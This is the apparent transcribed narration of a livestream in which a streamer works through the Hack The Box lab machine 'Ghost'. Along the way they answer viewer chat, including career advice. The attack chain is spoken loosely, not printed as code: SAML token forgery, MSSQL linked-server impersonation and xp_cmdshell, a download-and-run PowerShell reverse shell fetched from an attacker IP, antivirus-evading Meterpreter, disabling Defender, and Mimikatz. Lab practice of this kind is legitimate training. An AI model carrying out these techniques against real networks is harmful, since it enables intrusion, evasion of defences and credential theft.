Attribute value. Is that what it wants? I think it wants this. Just this. And then we're going to want to remove this with the administrator. Holy shit, did I do it? Oops. Administrator. I think I may have just done it. Server error. Frick you, man. It's time sensitive. What does that mean? It's time sensitive. Oh, do you mean I gotta be quick with it or something? It doesn't change the value. Doesn't look like it's changing anything. I mean, I could curl post this if I wanted to be fast, but... What? Volume? No volume. 444. Now... Okay, I guess I'll do post just to be fast. So... Or curl it to be fast. Curl. HTTP. Bam. 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 Dash data. Bam. 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 Dash X post. Okay. What was the response there? think it's X. What is it for proxy? I think it might just be dash proxy. 27.0.0.1 80. Looks like that worked. Okay. So generate another one. Put this thing in here. I'm probably too slow with it even this way. Server error. Well, that's not good. Let me re-log in as the other user and try to get the thing again. What up, Stratacat? What's it doing? Let me go back to Federation. Oh, it's because of my cookies. Did I crash it? I don't think so. Sure hope not. Fucking cookies. Goodbye. There we go. Bye-bye cookies. I wanted that actually. Alright. Clear all this. Sign it. Yeah, man. I mean, that all looks fine. Wait, I think I know what I need to do. Let me try something. Let's go back to administrator. Hackerbox. I think I need to do this. No, because then I don't get the response. How are they doing it? In this article. What is this fucking... Get out of here. No. You don't want your stupid sock. No, not this one. I want this one. Man. This one. No, they don't show shit in that article, never mind. Let me go back to the one that worked. This one worked. So this again. Yeah, okay, so this is still working. So it has nothing to do with time, I don't think. Must be something wrong on my end. That's fine. It's nothing. I'm tripping. Chat, I'm tweaking. Why ain't it working? Decode SAML response. You mean this? Decode this? Let me just this. Shows it here anyways. See this? I don't know if that's the expiration. I can't search this. Fuck, I have to, okay. Yeah, there's no expiration. Nothing about that. I see this. Not before or not after. Yeah. I don't know. What's the date? That might be wrong. That might be wrong. Because the time might not be right. I don't think this time's right. It's not synced up with the server. Because right now, it's 1 PM where I am. This is saying it's fucking... No, the 24-hour time. So that's like 4 PM. Yeah, time zone. So I think that's... You might be right. You might be onto something there. So, is there a way I can set the time? What, can I use fake time? Or can I do R date? Is he at the end? Time zone is coordinated with the universal time suite. Oh, okay. Alright, maybe I'll just do this. I work. Okay, so that's right. That's how it should be. This is fine. That's how it should be. So these are valid. In terms of expiration. What is... my guess is that it's something with the... something. Something else. Attribute value attribute. Yeah, that looks great. That looks like how it should be. RP identifier. Identifier of the relaying party that's receiving the token. Let's try this. Jet! Hold on! We did it! Oh, what was it? Let's go back a bunch till we get there. Here we go. Storage, cookies. Update that. Internal server error. You dirty dog. Just follow. I'll follow it. I'll keep it in burp. What happened? Follow. Eh! Send. Cool, redirect. I didn't set my cookie. Oh, fuck you, burp. I'll set it myself then. Server error with the cookie. It gives me an invalid cookie? Now it works, right? But it gives me an invalid cookie. Why? Yeah, could. No, good. What is this? What is this shenanigans? What? Huh? It literally worked. And then I was like, no. No longer will I work for you. No longer. What? Yeah, what just happened? Like, it's working now, but it's not working now. How? How is it the cookie? Yo, Root Sick. Yeah. That's how I'm feeling right now. It authenticated me and then gave me a bad cookie. Like, oh yeah, this is great. Sure, you're good to go. Here's your cookie to sign in for your session. All right. Nope. Oh, that doesn't work. No, thank you. What do I even do about that? Like, at least before we knew it was on my fault, right? Because now, like, we knew it was this that was wrong, and it returned to 500. But now that we have this right, I would assume it would send us a valid cookie. But it don't. Why is the cookie bad? Is it on our end? Is there still something wrong with this? What could be wrong? Brother, current students studying cybersecurity. And I'm 1 year away from graduation. I feel like I'm lost, to be honest. Because of our messed up study plan, we are all forced as a cybersecurity to follow governance path, which we are not allowed to pick any other path. I feel lost because I'm forced to do the governance path. Feels like I'm wasting my time. Would I recommend any suggestions? My suggestion would be to do what you want to do. If you don't like GRC, then don't do GRC. It sucks that that is the path of your college gave you, but you got to make the most of it. You do. So if I was in your situation, you already have a lot of GRC experience in education, it sounds like, from the course. So you can definitely use that to get a job in cybersecurity. It may not be as technical as, say, red teaming. But a foot in the door is the hardest part of getting a cybersecurity job. So if you get a foot in the door, if you get the foot in the door, and even if it's GRC, then that's fine, and you can pivot once you're in. In the meantime, you can still learn red teaming if that's what you want to do. You can still learn that, right? There's platforms like Hack the Box, Try Hack Me to learn it in your free time as well. So there are, I don't know any college or university that has a red teaming program. None do. So maybe you want to pivot to something more like networking based or computer science based if you want to be more technical. But that's all for you to decide. Hello. Kudra 64. What's up? Yep. Very true. It's all self-study. Dude, you gotta do research on your own. Just like we're doing. But we're not having a good time. Because this shit not working. There's a million things that can be wrong here. No, that's not true. There's one thing that's wrong. And I don't know what it is. Because we have it working. I don't think it's the assertions thing, because this looks good. Well, I don't think it's RP identifier. It may be with these keys. We have to regenerate these keys. I don't think so, but maybe. You're having a great time because it's not you doing it. Nice. Maybe it's the format, the URN. is wrong. I mean, that does look fine, but nah, that looks fine. I don't understand anything you're saying because I don't speak English, but I enjoy the live. Google Translate helps me here. Watching from Brazil. Awesome. It's great to hear. Well, I'm glad Google Translate's helping. AD format, you know this. CM bearer. Oops. I would assume it's this one that we want. That seems correct. Name ID. That's definitely it, isn't it? Name ID, yeah. Yeah, that's it. That's it. That's it right there. Wait, is that the one that I just crafted, though? Is that why? Oh, I crafted this one. Okay, obviously it's going to be the one that I crafted. What was the one in the response that I made? It was like temp, wasn't it? Open TMP... No. Was it output.xml? Was that it? This might have been it. Okay. Stupid plays. Hello. You're thinking time was correct in SAML. Yes, time was correct. I mean, I don't know exactly, but it seemed reasonable. Assertion ID. Attribute statement. There's multiple attributes. Hold on, Chad. There's multiple attributes. We need this one as well. I think we need this one as well. Oops, just close it. We're gonna wait till ads are over for the moment of truth. Administrator. Okay, that's done. We're waiting till ads are over. I think this might have been it. Oh. It's a video they don't show in movies how hacking really looks. Mr. Robot's fairly realistic, but that's not a movie, it's a TV show. I mean, the point of a movie isn't to be realistic. If a movie was realistic, it'd be kind of boring, right? The point of movies is to be like spicy. I mean, there's some crazy shit that's like nowhere near realistic, but it's funny to watch. I mean, it's called Tree and Sea Matrix. Do they actually do that in movies? Do they just like tree slash? Is this what they actually do in movies? I've never seen that before. I don't know. I don't watch a lot of like hacking movies. Most of it is just like just some random CGI cool looking stuff. What operating system am I using? On my host, I'm using Windows 10. This right here is a virtual machine, and I'm running Kali Linux on that. Alright, ads are over. Ads are over. And I think... Let's try out the new attribute. Where did I just generate that? Where was I? Did I close it? Don't tell me I fucking killed it. Dude, I must have killed it. Oh no, it's up here. It's up here, it's up here. Okay, here we go. So I saw there was another attribute under the attribute statement. So I did both. So now we're trying this. Bada bing. Bada boom. Okay. New cookie. And we don't get it! No, we did it! Oh, we did it! Oh. Okay. Okay, okay. We got a valid cookie now. Oh. Update that. Refresh. Alright. Okay. Ghost config panel. Database debug. Alright, we're almost done. Hopefully. Currently misconfigured databases. MS SQL. Okay, the database is correctly linked. We did see linking involved. We did see some linking involved with the... I didn't see anything, like, suspicious about it, but that was a thing. Oh! Are you telling me that... Ugh. Are you telling me we can put SQL queries in here? Is it just XP CMD shell from here? Hopefully. Select... Can we do version like this? Yes, we can. That does work. Okay, I'm gonna use this as my quest for now on. Select version. Actually, I don't know if I like that. I don't even need to use Berber. I'm just gonna use the web thingy. Where's my notes on MS SQL? MS SQL. All right. Are we a database admin? No, we are not. Big sad. Who are we? Can we impersonate anyone? No. It said rows affected 1. Don't mess up the database. I would never. It's the user. MS SQL. Current user. Will that work? I don't know if that would work. Let's see. Oh, we have so many tabs. Alright, we can close all these now. Keep BloodHound open, just in case. We're done with ADFS. Done with that, done with that. Okay. Web client. Okay. Interesting. Alright, let's just start dumping databases then. Dump databases. Or show databases. Oh, there's nothing special. This is what we were at before. Can we enable XPCMD shell? No. Fuck. Can I try? It's weird that it says only support for main database, sorry. Databases are currently linked. Select link searches. DC1 primary. Can I do this? Do I put it in the brackets or keep it out? Yeah, I can't do that. Okay. Can I XP stir tree? Forgot to use XP stir tree without impact it. Ugh. Exec. XP dirt tree. Empty. That doesn't seem right. Let me try. It didn't say permission denied though. Let me try the responder thing. Huh. I don't even get output for that. Strange. Which level is this box? This is an insane machine. Did I? Yeah, I'm not gonna have that. This is Windows insane. Wait a second. It could be doing just SQL CMD to execute these. It could just be like the difficulty rating, yeah, insane. Could be a command injection in PowerShell. It may not, but it could be. Can we sleep in? Forget to sleep in PowerShell. Oops. Is it just sleep? Does that work? I guess sleep works in PowerShell. Try this. That's probably not it. No. This isn't it. No, this is weird. Is a comment in PowerShell just a hashtag? The databases are currently linked. Gus, thanks for the follow. Only supported for main databases, sorry. And I couldn't run. Don't impersonate. None of this. I could try creating files. Possibly. I could try reading local files. No. Can't do that. There are linked servers. But I can't execute anything on DCO1. Which is weird. Can we do with linked database? Well, we couldn't execute anything on it from what I saw. Yeah, we're not defined as a remote login as a server. I mean, maybe we should do more research on Cisco linked server. I know it's not a database, it's a linked server. Did I say database on accident? I didn't mean that. What's this? I've already clicked on this before. Oh, when we talk about linked servers, we usually think of links to other SQL Server instances. Also, delve into ADSI, Active Directory Service Interfaces. Link servers in SQL, not an Active Directory. After discussing its inner workings, we are presenting a technique to retrieve. What is this? Do I try that? Means you can query the other database. Yeah. The other comment on the page. I mean, we tried to execute a SQL query on the linked server, and we couldn't connect. Let's work for the main database. Wait, I didn't. That's weird. That's saying only one database, the main database? I mean, there's no other special databases, though, because these are all default. There's no database called main. Like, master is like a master database, but there's no database called main. Do I have to specify the database for the link? Gotcha. Okay. Can I... This is my only command example for executing across links. Hopefully that still works. So instead of select this, I just execute. No, because that wouldn't matter, because I'm not accessing a specific database. I'm just getting the version. Get tables across SQL links. What the fuck? Where's my... There we go. Couple articles to look at. This is a crawler. What the fuck? Well, that's not gonna work. Let me try this. I might as well just try this command. See what happens. See what happens. Not find server async service. DC1's not configured for data access. The fuck? Are you trying to hit a domain controller which isn't a MSSQL? What do you... Well, MSSQL is running on the domain controller, if that's what you mean. Select starting from servers. We've already done that. I know, that retrieves all the linked servers. We already have that. Yeah, it's just DC1 and primary. Not gonna lie, chat, I thought the last step would be like the last step. But I suppose not. We should be able to do this if we wanted to. Could we dump this? It's weird because all right. Here's what's interesting: is that this isn't a what is our username again? Where did we get MSSQL user? Current user. What's interesting is this isn't a local user on MSSQL. But there's no domain user called web client. So, I mean, I guess it has to be a local user on MSSQL. But when I get all users, see all users. I want all MS. You, Google. Because, like, when we did that with MSSQL client, with the intranet principal account, we just got domain users and the SA, which is the built-in sysadmin account for MSSQL. So I'm curious where this web client came from. It's just odd. Hopefully this will work. Okay. Interesting. So now we have web client in here and SA. Why did I not see web client earlier? We must be on something different. On something different, that's for sure. What? Logins. Yeah, SA and built-in users. This is strange. Let me run that weird command on here. Ah, you didn't do it in one freaking line, you goober. Yeah, strange. What? There's no SQL injection because we're running any SQL query. And XBCMD shell we can't enable. We don't have privileges to do that. So I'm curious why we have a web client here and we don't otherwise. Strange. The account is strange. Only supported for the main database. Sorry. What is the main database? There's no database. Try to query. Well, yeah, I can't even get access. What's on a linked database? And I did try to query that, but I can't execute across the link. I can't do any execution across the link. What I was trying to do. Where was it? It's gone. But yeah, we can't enable XPCB shell. That's too easy. Yeah, that's true. We did use the exec command. I didn't open query yet. Oh, I don't know the syntax for open query. I'll just get that open query. Let's just go. Okay. Interesting. Let me put this in my notes as well for link servers. Just open this. Okay. DC01, select. Let's just do select version. EC1's not configured for data access. Not configured for data access. We got this error before. We tried to do something similar, and it was a no-go. Well, it's the name of the linked server. Right? Like, when you do this... you get the linked server name. No, I'm telling you, like MS SQL is running on the domain controller. Y'all picking up what I'm putting down? Like, I don't think just putting... what do you mean, MS SQL in here is not going to do anything? Yeah, it has to be specified in there. Alright, I'm gonna go back to... I can't even run this because it's like through a web app. Could read it if I wanted. I didn't even check the SQL version. Like, if there were any, like, vulnerabilities associated with that. I don't think so. I don't think that'd be it. I think we're good. Hold on. Let's go back to our roots. MSS SQL. Go to the top. User databases. Use a database. Get table names. I mean, all these are default databases. I don't think there's any special database. Wait, there's a way to dump user. Where are we? Here are we. Web client. Kali GPT. Wait, we're a database owner of what? No, that's a different account. This is weird. This filters some of the drill. Okay, we'll use this instead as well. Oops. Let's filter this. DBO guest. Yeah. Yeah. Alright, we're a standard SQL user. You know that. Authentication type instance. Not sure what that is. Interesting. Get all my permissions. I guess get permissions over secure type server. We can connect and view any database. That is nothing, because there's no useful databases. Man, this is rough. Oh, maybe. Yeah, no. Huh. Wait, where's the password? Get hash passwords. There's no passwords. Checking that after. Oh. Exec SP linked servers do. Where'd you see that? Here. List link servers. It's probably going to show the same thing. DC01 in primary. Yep. Yep. Can we write? No. Doubt it. Can we read? I don't think so. Did I already try this? I may have. Yeah. Can't do bulk stuff. I could try writing if I really want to, but I don't think we have permission to do that. Who knows? We might. We might. Windows tasks test. Denied. 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 Yeah, we can read registry keys. Access denied. Figured. Load remote DLL. Valid object name. Oh. Well, obviously. That's supposed to be a specific table name? Where did they get this? Which could be interesting. I'll check this out as well. Primary, no, this primary is not. That's the current server we're working with. We are trustworthy on MSDB. Regular is given the role DB owner over the database owned by admin. If the regular reason was given the role DB owner, do we have the DB owner role? Get owners of databases. Owner SID. We tried that a little bit. No. Fuck. Damn it. Wait, no, that's good. We just want the DB owner role. How do we see that? Get roles over selected database. Okay, so use MSDB. And oh shit! We are DB owner? Wait, are we good? Database user DBO. Okay, maybe. We might be DB owner of a trustworthy database. Alright, use MSDB. Create a stored procedure to add your user to sysrole admin. What are we? Web something? Select username. Web client. So use MSDB. Incorrect syntax near sysadmin. Oh, quotation mark. Didn't get copied over. Create alter must be the first statement in a query batch. Permission denied. Database master. I don't want database master. I want database MSDB. You dirty dog. Does that work? Hold on. Can I do this? I don't think so. We'll see. Yeah. Well, fuck. Why I can't use it and then run it? Damn. Okay. Well, this might be a ChatGPT fix. Good luck my gym time. Hell yeah. Thanks for stopping by, Stratacat. Alright, will this work? I don't think so. Yeah. I can't do this in the database that I want to? I want MSDB. Oh, there we go. That worked. Create procedure permission denied for MSDB. Fuck. Never mind, that's a dud. think we already checked this. It was empty. Yeah. Alright, MS SQL AD abuse. Might be doing something in there. How do we do? PowerShell. Just the hashtag, yeah. Doesn't look like I can like escape this at all. Alright. Oh, it's like I feel like we're one step away from root. Or two. I don't know. We'll see. Can't run these because of a shell. We do have a shell, but like... Dude, I wish we could get our own password. That'd be cool as well from the web client, but we tried to like dump the hashes and it didn't work. Yeah, I couldn't do that. Google Map can find something? I mean... I don't think so. I mean, the main purpose of SQL Map is for finding SQL injection. We can run any SQL statement, so it's more of like an exploitation side now, like of privilege escalation. And I don't think SQL Map's really made for that. I mean, anything that SQL Map, I think, has run, we could run as well. We already have ran. Yeah, that's true. Damn, bro. Alright, I'm like running out of ideas with this. I mean, I guess, sure. Let's fucking try it, I guess. SQL request. SQL Map. Let's just dash HTB MS. SQL. How are you struggling with this? How are you struggling with this? Brother, there's no injection, it's just... Do you need me to start it with a... Like, put a little apostrophe before it or something? You're failing? You failed? Wait, bad request. Why is it hitting bad requests? We had a proxy it too, right? Proxy, that's just proxy equals. Bad request, eh? Plain HTTP request was sent. HTTP port. Oh. That's why. How do I change the protocol? Force HTTPS? No, we want just HTTP, not HTTPS. Oh, we do want HTTPS. Never mind. Oops. There's no force HTTPS. There's force HTTP, or what was that? Force SSL. That's what we want. That's what we want. Force SSL. Now it's working. We're good. No worries. I'm just confused on how it hasn't found SQL injection yet. I mean, you gotta be dumb as bricks, ChatGPT or SQL map. Okay, there we go. We're good. We're good. We're good. They got it. We're good. We're good. Jeez. Oh, it took so long. Alright, we don't need all the injection types. SQL map, chill. Thank you. Alright. So, is DBA. Obviously, you should respond with no. We're not. False. Okay, cool. Wait, the web server is on Linux, but it's running MSSQL. Is it just querying MSSQL from DCO1, probably? That's what's happening. Oh, this is weird. Privileges? That did not leak much. OS shall be easy for me. No, yeah, didn't think so. Yeah, like we've already tried all the exploitation stuff that SQL map would do. Like, whoops. Like, what else is there, man? Users, we already know the users. It's web client and the server admin. Oops. Yeah. Gosh, HH. Where's exploitation? SA is default. Yes, SA is the default administrator user. Yeah, you are correct. Try something like this. That just resulted in nothing. Okay, sweet. Could try file read write again. All right. We can. All right. SQL map's not gonna help because it's gonna be like stuff with like remote links and I don't think, right? I don't think SQL map's gonna have anything that's gonna help us here. I do not think so. Okay. I will try file read write on both operating systems. Doubt it'll work though. Yep, fail. Windows win.ini. Yeah, fail. Don't know if this matters. What was that? For solo, thanks for the follow. Yeah, fails. Alright, dude. Forget SQL map. Forget it. Okay, we're not dealing with SQL injection, first of all. You can't really classify this as SQL injection. And second of all, we don't have privileges to enable XVCMD shell. We've already tried that. That was like the first thing we tried. What else could it be? Like it. We haven't seen this domain before. Corp.ghost at hack the box. We haven't really seen that before. So that's kind of strange. I mean, look at it. Yo, Junior. The databases are correctly linked. Go from Corp to Ghost. What do you mean go from corp to ghost? You mean like the server? Like the linked server? I mean, we can't... Okay, we could try, I guess. It's like... I don't exactly get what you're picking up. Oops. Oh, fuck. We've already done that. Yeah, it's just... It says DC01 and primary. Yo, Edwin. Look, Junior, it's just DC01 and primary. It's not gonna be related to like web vhosts. We're way past that stage. So on Ghost, yeah. I feel like we're basically on like one of the last steps here. Maybe before we looked at all this. Hold on. No shot we need to spoof this again, right? There's no way, right? Whoop. That does already exist. Hold on. So we do need to add this to our host file. That's not us, but corp dot ghost dot applebox. Where is that? Is it a... It's not this. This is... Alright, this is what we were at earlier. Could be on 8008. Why is it so slow? Nope, that's standard. We just checked 844. No, we did. Yeah, we did 8443. Nothing there. It's not just gonna be HTTP. Yeah, nothing. Okay. Huh. So that host does exist. I guess it says it's a domain. It's not even like a host name. It's like an extended domain. Why does that matter? I'm tweaking, chat. DC1 is Ghost and primary. I don't even know. I don't think this is there. No, these aren't. This isn't a different host. This can't be a different host because there's only 2 machines. There's only 2 machine accounts in the domain. Well, unless it's cross forest. No, I don't think so. It's, I don't know why there's a separate domain there. Corp. Took you a week to do Ghost. Thank you. I mean, we're still not done yet. The databases are correctly linked. Alright, I'm actually tweaking. Hold on. I'm gonna go to my GPT model on my host for this. Like SP help server. In there. No data access on DC, which is what we figured out. RPC is enabled. Can't query it. If RPC out is enabled, you may be able to execute commands directly on DC1. Yeah, that'd be ridiculous. Yeah. We could run a command with a user perspective. So you as log SA. That's only if you have like impersonation, right? Yeah, that's only if we have impersonation. We don't have impersonation. Unfortunately. It's not that easy. Nope, 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 none of that. This isn't gonna work either. Dirty dog. I know. Jeez, dude. Alright. ChatGPT doesn't even know. This is once we get RCE, right? Yeah. What the fuck? What does this do for me? Spooling servers. The only two servers are primary and DC01. And DC01 we can't get data from. We were just there. Can I go back and... Yeah, I can. Here we go. Okay, I feel like almost at this point it's not SQL related. Server name? DC01. This is interesting. It is SQL related. Okay, well. What else is there to do? We have no impersonation. We have no privileges. We at primary? No shot. It's not impersonation, already checked. Is it because we are at DC01 and I was tripping the whole time? I fear it was. What just happened? My command disappeared. Oh, I killed it. That's it. Each primary there. Something like this. Rich Corp is our system user. Huh. So this is cross. So this is cross links. This is across links. This is not. Let me just verify this. Let me just paste this here for a sec. Oops. Bam. So primary is not, bro. I was under the assumption that we are primary for some reason. That's why I was tweaking out. Where's the bad syntax? Here? Yeah, we're on DC01. Oh my gosh, that's why. It's radio or playlist? This is a custom playlist I made. From, it's all songs from White Bat Audio. Yeah, I know I ran this, I just didn't understand. I was trying to run it against DC01, which didn't help us at all, because we are on DC01. This is DC01 right here. I should have checked the host name. Primary is the remote, I guess, the linked server. Not necessarily remote, but it's the linked server that we want to access. And now we get a different user there. So my bet is that this user can now, what, XPCMD shell? Let's copy all these. Your show, where's show? Oh, there. Execute. Okay, well that's probably why. This is bad. This is no good. Bam. Select user. Bam. Okay, there we go. Bridgeport. All right, now we do the whole thing over again. So we're not database admin. Now impersonation from this. Now we have syntax errors. It's not gonna work. Yeah. We need to do doubles here. There we go. And we can impersonate SA. Oh my gosh! This is fucking crazy. Okay. So we do as SA here. I think. As SA. How do we do? Where is it? Execute. Login as SA. Execute. At primary. As login equals SA. Is that what? Oh, maybe this before that primary? Well, SA doesn't exist. It just showed we had impersonation privileges. Oh, you know why? I'm tweaking. I'm doing it outside the box. I gotta be inside the box. I gotta be in here. And we can do this. And then inside of here, we do as SA. I'm tweaking. So this is what we want. I'd like this all in one line. I do this, and then select. Can't type select username, and then it should return SA if we did it right. Syntax for SA. Why is that wrong? Oh, double quotes in there. yo. Database owner? That's our new name? Okay. Alright. Sure. Whatever. Can we now enable XP-CMD shell? That's all I want. Double in here. And then we'll do reconfigure. And then we'll do this. No, this is for creating a file. Where's my CMD shell? Here it is. This has got to be in double quotes as well. Huh? I'll click it. And then configure again. Alright, if this works, hopefully. That'd be a pain in the ass if it didn't. And then XP CMD shell. Who am I? Hopefully that doesn't need to be in quotes. I might need to. Try that. Incorrect syntax in your SP configure. What? Oh, it's execute before. Fuck. Incorrect syntax in your SP CMD shell. Which one? This one? Let's just remove this last one, see if it works. Okay. That's a great sign. Now execute XP. Wait, how do we execute XP? I completely forgot. Like, really. Like without impact it. Execution digital. That's it. That's what I thought. Oh, it's gotta be in quotes. That's why. Nope. Wait, did I just... I might have fucked it. Man. I didn't do... yeah, I didn't do XQ as SA, that's why. Oh my gosh, it's so embedded. What did I just delete? Tweaking. Okay, this can go. And this can stay. This is what we want. No, it's not what we want. Still tweaking. Here. Bam. Bam. Yes, this will work. Nope. My syntax, dude. Why is that wrong? Okay, come on. Are you kidding me? This is it. I think I was just doing it wrong. Bam. Double here. Bam. Correct syntax, so. At prime, what? Oh. Bam. Oh, we got it. Oh my god, syntax hell, I got it. Missed a single quote there. Okay. Okay. We're good now. Alright, we're good, we're good, we're good, we're good. We're good, we're good, we're good, we're good. Oh my gosh, that's it. That's it, chat. That's it. Give me this rev shell, sure. Yeah, NT sequels, this is gonna be SE impersonate. Shell dot exe me RO wrap. Re-listen. Execute this. Why don't I have a shell? I don't have a shell. Failed to cancel request. It timed out. Put time out. You dirty dog. Ha! Okay, maybe no PowerShell? Just wandered. Holy fuck. I think it's the web app's tweaking out. I'm gonna try, like, I'm just gonna download a payload and then execute it. Let's just do curl 10.10.14.237. We do curl like this, maybe. Rev.ps1. Actually, no, let's just do IEX and just execute it in memory. Hopefully that'll work. IEX. Here, we see this. IWR. Type in IO. Okay. PowerShell.exe. IWR. This. Piped into IEX. That'll work. Alright. And then let's just get a PowerShell reverse shell. This looks good. What did I call it? Rev.ps1. Here's reverse shell. Goes to this. Cool. Hosted. Send this. Nothing happened. IEX is not supported. I ran that with PowerShell though. Oh, IEX isn't. Is it capital? Does caps matter there? That's surprising. What? How was IEX? Oh, power. Wait. Really? What if I put this in quotes? How would I do that? Maybe this. Hopefully. Well, now it's just... Oh, there we go. I grabbed it. Please execute it. Internet Explorer is not available. Alright, I know a fix for that. Let's just use basic parsing. Alright, there we go. Use basic parsing. Now this should work. Holy fizzle. Give me a shell, dude. Motherfucker. It's the... Okay. No, it didn't grab the rift shell. It did. Oh! We have AV. That's fine. That's fine. That's fine. That's fine. I got one that'll bypass that. It is AV. That's fine, though. Alright. We'll use this one for now. Post it again. On this again. And then we're gonna have shell pop. Bam. Let's go! Alright, then we might slash priv. We were the MS SQL service, so we're gonna have SC impersonate. And now I just upload something like dead potato. Let's go to Windows tasks. Perl 10.10.14.137 slash dead potato.exe. Okay. On that. Oh, that might get blocked by AV as well. Fuck. Keep forgetting we have AV in here. Fuck, did my entire session get killed because of AV? Yeah. Okay, we still have a session, but we gotta do some obfuscation. In the meantime, we gotta run ahead. Okay, is dead potato in .NET? This is the very last step to administrator. The very last step. Seems to be in .NET. We might be able to reflectively load this in memory with PowerShell. We could, or is there like a damn, we might actually need to obfuscate this. Damn, they updated signatures on this box? Oh, it's actually pretty new, never mind. I didn't know it was that new. Alright, that's over. I'm just thinking about how I want to go about obfuscating this the easiest way. Is there a dead potato PS1? Bad potato. This is gonna get caught for sure. I'm almost certain. I'll give it a shot though. It's not what I copied. Block dude malicious content. Yeah, okay. Alright. Nothing from the internet's gonna work. This is a pretty recent box as well. So I fear that we're gonna have to do our own obfuscation. And but what sucks is I have to run that on a Windows box. Because I'm not gonna do .NET dev on a Linux machine. I'm not gonna go through that hell. So, maybe I just boot up a Windows box and we start obfuscating Dead Potato. Use DS Viper with Interpreter? What's DS Viper? Shellcode exe. Oh, this is pretty new. Not super new. It's 3 months. I'll take it. Can I do something with wine? For running, yes. For running Windows binaries, it helps. But we need to make our entire tool. That's why. That works with interpreter, really. And then is get system gonna get caught? Maybe, maybe not. I'll try this out. It's a cool tool. How does it want me to install this? Here we go. Sure. This isn't recommended. Let me just git clone this. Thanks for the plug, Junior. And it was bash install dependencies. That sucks. And it's gonna force me to update my machine. And what do you mean by it only works from Interpreter? That doesn't really make sense. Because, like, Interpreter is the most signatured malware on the planet. That's probably a lie, but, like, one of them. I'm surprised it wouldn't work for anything else. Okay. Hopefully that installed well. Server shellcode and other portable executables fail. You get the payload to work? Which one, Cypher? Which payload are you talking about? For SQL stuff? SQL 1. Yeah, so, okay, we were looking at the links. I was tweaking, and I thought that the DC was the link server we want to be attacking, but checking, but we were actually on DC, which is what we were executing shit on. We were executing on the DC server. We wanted to go to the primary server. So once we did that, we saw we were on a different user called, I forget what the name was, but it wasn't web client no more. Yeah. And then we checked impersonation privileges on that linked server. We can impersonate SSA, and then it was XPCMD shell. And then we loaded a obfuscated PowerShell reverse shell in memory to get a reverse shell. Last part is just SE impersonate, because we are an MS SQL service. But we still have to deal with AV. So we're trying this tool out. Let's go ahead and copy this. Whoops. Get some interpreter binary. 10.10.14.137. Let's do 8443. That all looks good. And then just run Viper to AS injection, ADS self injection. And the file name. Use AS. Yeah. I will. Does it do dynamic XOR? Or is it just like one single XOR? Because that's kind of silly. Okay, we have this now. Do we have Metasploit up? No, we don't. Let's go ahead and upload this. Wherever we are. Where's our shell? Oh, here it is. CD, Viper. All right. Get this. Wait, what? Oh shit! I didn't even. Oh no, I did set those right. Okay, I was about to say. I forgot I didn't set lhost and L4. That would have been bad. 8443. I don't know why sometimes exploit works and sometimes run works. I guess I think it depends on this. Whatever though. Not a big deal. Alright, moment of truth. Okay, we have an interpreter session, which is great. Get system. This is what we want. That was the whole point of doing this. I have a feeling we're gonna get flagged here. Yeah. Oh! Oh, damn, that worked. Oh, damn. What is it? Where's the where's like the who am I thing? Give me 2k channel points. You're not getting 2k channel points. Get Sid. Get UID. Yeah, that's it. There we go. Let's go. Type C users administrator root.txt. Export-f. Alright. Oh, it's just only for executables, whatever. Can we drop into a shell? Typically that's like... Oh, I can, wow. Huh? Oh, desktop. Duh. Desktop. Huh? Wow, he's got a lot of stuff. Oh, he's got the entire SQL. What do you call it? Dude, where's the flag? Hostname. Oh, fuck. We're not on the domain controller. Alright, time for... God damn it! We're on primary. Damn. Alright, forgot. Alright, so now we gotta do post. Now we gotta do post. 10 more hours. Not 10 more hours. It's probably just like... Probably like, I don't know. Could probably just run Mimikatz and call it a day. Except that we can't because it's not that easy. Because AV. Dropping a power shot. All right. Let's just. I'm admin. I can turn off Defender. Wait, you're so right. I completely forgot about that. Turn off. That is my first notes. That is my first. I'm gonna put this tool in here as well. That is my first note in evasion for Defender. Just turn it off. Forgot about that. Easy clap. Hell yeah. Not CD. Bam. Later. Shutting down. All right. Now it's time to get dirty. The interpreter or the Mimikat's on interpreter's ass, like the built-in Mimikat's. It never works for me. It's like load Mimikat's. Like this shit's ass for me. That never works. Ghost Corp. So this is a separate domain, huh? Yo, Clever Press. This isn't an actual user, is it? Like on this domain? Yeah, doesn't exist. Why are you giving me the command for a golden ticket? Do I... guess we're on BloodHound on this. I guess we're on BloodHound on this. Let's get Sharphound on here. Um, 137/ Yo GoPro. GoPro. Just a guy, thanks for the follow. How you doing, man? I know you're working on what? Some dev thing that you're pushing to prod? I don't know. Tell me about it. We're doing Ghost on Hack the Box. Sharphound. .exe. Sharphound. Clips. Rated run tired. You're gonna leave me with clips. That's the only context. Okay. Oh, I wanted to zip it. Fuck. Fuck. Oops. Is it -- zip in the file name? Yo, don't kill my shell. Oh, it did zip. All right, awesome. So download this. Okay, we have this now. Let's open this in BloodHound. This is a cool box, dude. This is very CPTS-like, if I have to say. It's probably a little bit more advanced, but it still has similar concepts. Don't kill my shell. Wait, that would be a good t-shirt. That would be a good t-shirt. I'm keeping that one in the back of my head for when I can make merch. I'm stealing that idea, and you're getting no credit. Matter of fact, you're getting banned, so you can't even talk about it. Just kidding. You're gonna do absolute. Did I do that box? Oh, I have not. Good luck. User, I would rate, 8. 8.5, but I'm gonna round down. You said it, man. I suppose I did. You gave me the idea, though. We're still ingesting. Ooh. Now we're analyzing. Now we're done. Alright, so... Who do we have owned? Primary. This whole machine is owned. It's probably some trust-related thing across domains. It's my guess. Here we go. We can DC sync to Corp. Oh, never mind. That's no. This is all for Corp. The Corp. It's like a child domain is what this is, I believe. Let me go to my notes on this. Child to parent from Windows. Is it trusted? I would assume. Can we enumerate trusts from BloodHound? I would assume you can. Click on this. How about trusts? Yeah, we're good. We're trusted. Alright, cool. IRL, you have a complete mess and usually roam free throughout the network. Usually. In regards to what? What are you talking about? I have to actually get inside the network of companies. We're talking about like pen testing here? I'm kind of confused. Like from an external engagement? I need to refresh my memory on this. I did a pen test and I got DA. I'm not even going to talk about it. It was very easy. I mean, the thing is we do have file system access on the parent domain. DC of the parent domain. So we don't really need to worry about that specifically. I mean, I guess that was just the example. That was just the example, I think. Did Tomb Watcher. What? Oh, I did Tom. Wait, what? Oh, there it is. Oh, that's the active one. Can't do that one. Is this KBTGT for the child, I assume? I think we do that. I think I need to upload Mimic. Oh, I can't upload Mimikatz though because of fucking... Oh no, we just turned it off. I'm tweaking, bro. I'm tweaking. I gotta say, goddamn AV, but we turned it off. Eh. All right, we're already there. Okay, we're good. Curl. Let's go back. Oh, I can't. Fuck you, dude. Mimi cats. Mimi cats. Mimi cats. Mimi cats. Mimi cats. Huh? Oh. Obviously. I just copy pasted from my notes without even realizing 